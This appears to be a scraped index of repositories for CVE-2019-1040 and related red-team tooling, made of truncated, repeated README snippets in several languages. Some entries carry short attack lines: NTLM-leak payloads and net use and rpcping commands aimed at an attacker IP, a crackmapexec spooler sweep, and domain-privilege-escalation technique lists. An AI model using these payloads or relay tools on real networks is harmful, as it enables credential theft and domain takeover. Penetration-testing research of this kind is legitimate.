CVE-2019-1040

RedTeam参考，修改自Ridter的https://github.com/Ridter/Intranet_Penetration_Tips

Intranet Penetration CheetSheets Modified by: z3r0yu Blog: zeroyuxyz Table of Contents 信息搜集 开源情报信息收集（OSINT） github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 字典列表 密码生成 邮箱列表获取 泄露密码查询 对企业外部相关信息进行搜集 子域名获取 �

All_NTLM_leak PDF file /F (\\\\IP@80\\t) dubdoc ///1234@80/t Doc Target=file://1234@80/tdotx URL file://IP@80/thtm lnk URL=file://1234@80/thtm IconFile \\1234@80\tico rpcping rpcping -s 1234 -e 1234 -a privacy -u NTLM dir dir \\1234@SSL@443\DavWWWRoot\testexe Net command + WebDAV envoke net use \\1234@80\t net use * \\1234@SSL@443\folder\subfolder

Author: Evi1cg Blog: evi1cggithubio Table of Contents 信息搜集 开源情报信息收集（OSINT） github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 字典列表 邮箱列表获取 泄露密码查询 对企业外部相关信息进行搜集 子域名获取 进入内网 基于企业弱账号漏洞 基�

Author: Evi1cg Blog: evi1cggithubio Table of Contents 信息搜集 开源情报信息收集（OSINT） github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 字典列表 邮箱列表获取 泄露密码查询 对企业外部相关信息进行搜集 子域名获取 进入内网 基于企业弱账号漏洞 基�

CVE-2019-1040 scanner Checks for CVE-2019-1040 vulnerability over SMB The script will establish a connection to the target host(s) and send an invalid NTLM authentication If this is accepted, the host is vulnerable to CVE-2019-1040 and you can execute the MIC Remove attack with ntlmrelayx Note that this does not generate failed login attempts as the login information itself

CougarCS InfoSec's multi-API wrapper for CVE and ExploitDB definitions and lookup.

PwnAtlas PwnAtlas is CougarCS InfoSec's multi-API wrapper module for CVE and ExploitDB lookup It currently features the ability to lookup CVE's by both a keyword search and by it's assigned ID It returns a dictionary of the most important values, which can be used for many purposes, including: Discord Bots Websites Python Scripts etc Installation Implementin

CVE-2019-1040 with Exchange

CVE-2019-1040 Great writeup! Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin So, I wrote CVE-2019-1040py for easy to use You can also check out my exchange2domain repo: githubcom/ridter/exchange2domain, another way to use exchange to get DC Requirements These tools require impacket You can install it from pip with pip install i

RedTeam参考，修改自Ridter的https://github.com/Ridter/Intranet_Penetration_Tips

Intranet Penetration CheetSheets Modified by: z3r0yu Blog: zeroyuxyz Table of Contents 信息搜集 开源情报信息收集（OSINT） github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 字典列表 密码生成 邮箱列表获取 泄露密码查询 对企业外部相关信息进行搜集 子域名获取 �

PrinterSpray Wrapper of githubcom/dirkjanm/krbrelayx/blob/master/printerbugpy to be used with a list of IPs Discover potentual targets crackmapexec smb [subnet] -u '' -p '' -M spooler | grep -a "Spooler service enabled" | awk -F " " '{print$2}' > spoolertxt Have responde

Techniques that can be used to get from domain user to domain admin

DomainUserToDomainAdminTechniques Techniques that can be used to get from domain user to domain admin Powerup PowerupSQL Find-InterestingFile Invoke-Kerberoast Get-GPPPassword Bloodhound Find-localadminaccess Domain Password Spray Inveigh - LLMNR NBNS Poisioning Get-ExploitableSystem PowerWebShot Invoke-ShareFinder / Invoke-FileFinder SCCM Matt Nelson

an impacket-dependent script exploiting CVE-2019-1040

dcpwn an impacket-dependent script exploiting CVE-2019-1040, with code partly borrowed from those security researchers that I'd like to say thanks to by taking a closer look you'll find the very technique for utilising the vulnerability slightly different to what common belief is

Author: Evi1cg Blog: evi1cggithubio Table of Contents 信息搜集 开源情报信息收集（OSINT） github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 字典列表 邮箱列表获取 泄露密码查询 对企业外部相关信息进行搜集 子域名获取 进入内网 基于企业弱账号漏洞 基�

Updated version for the tool UltraRealy with support of the CVE-2019-1040 exploit

UltraRelay Updated by Lazaar Sami for the exploit CVE-2019-1040 UltraRelay is a tool for LLMNR poisoning and relaying NTLM credentials It is based on Responder and impack I have updated the original version (githubcom/5alt/ultrarelay) for the exploit CVE-2019-1040 Dirk-jan Mollema has updated ntlmrelayx (part of githubcom/CoreSecurity/impacket) to have a --

2019年网上阅读过的文章记录

以下是我2019年12个月每个月阅读的汇总,文章大多数国外安全文章标题翻译的中文； 渗透 Exchange在渗透测试中的利用 文章中有些好的脚本提供，而不是单单爆破 2019 OSINT指南 渗透的本质是信息收集，永不放弃，有一段时间你会感觉到你已经探索了获取信息的所有可能性。不要放弃。休�

Author: Evi1cg Blog: evi1cggithubio Table of Contents 信息搜集 开源情报信息收集（OSINT） github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 字典列表 邮箱列表获取 泄露密码查询 对企业外部相关信息进行搜集 子域名获取 进入内网 基于企业弱账号漏洞 基�

Offensive tool to trigger network authentications as SYSTEM

Change-Lockscreen Change-Lockscreen is a tool to trigger network authentications as SYSTEM by changing the Windows lock screen image from the command line to perform privilege escalation attacks such as the one described in the post linked below: researchnccgroupcom/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-es

Pentesting Tools quick installer

Usage EasiWeaponssh heavily relies on Python virtual environments and uses pipx, poetry and pipenv to orchestra venvs In order to launch the bleeding-edge version of a tool installed with pipx and not the version that is already shipped with Kali, you should modify the PATH variable: Modify PATH for a normal user with any method you want (bashrc / profile / zshrc / etc):

Collection of extra pentest tools for Kali Linux

☢️☣️ NOT PROPERLY MAINTAINED ANYMORE It has become such a pain to properly maintain this repository (every new Kali release very likely breaks some dependencies for at least one of the million listed tools), so a smooth installation process is not guaranteed Now I treat WeaponizeKalish not as an automation script, but as a collection of useful tools (resources) to be

个人整理的一些域渗透Tricks，可能有一些错误。

Hunting-Active-Directory 个人整理的一些域渗透Tricks，可能有一些错误。 信息收集 常用命令 Net use Net view Tasklist /v Ipconfig /all net group /domain 获得所有域用户组列表 net group "domain admins" /domain 获得域管理员列表 net group "enterprise admins" /domain 获得企业管理员列表 net localgroup administra

All_NTLM_leak PDF file /F (\\\\IP@80\\t) dubdoc ///1234@80/t Doc Target=file://1234@80/tdotx URL file://IP@80/thtm lnk URL=file://1234@80/thtm IconFile \\1234@80\tico rpcping rpcping -s 1234 -e 1234 -a privacy -u NTLM dir dir \\1234@SSL@443\DavWWWRoot\testexe Net command + WebDAV envoke net use \\1234@80\t net use * \\1234@SSL@443\folder\subfolder

Recopilacion de sitios de referencia de diferentes ambitos

Sitios Web de Referencia o Consulta Pentest Pentesting Cheatsheets - githubcom/Kitsun3Sec/Pentest-Cheat-Sheets Pentesting Cheatsheets - iredteam/offensive-security-experiments/offensive-security-cheetsheets tips tipicos pentest - mediumcom/bug-bounty-hunting/beginner-tips-to-own-boxes-at-hackthebox-9ae3fec92a96 Tecnicas variadas - bitvi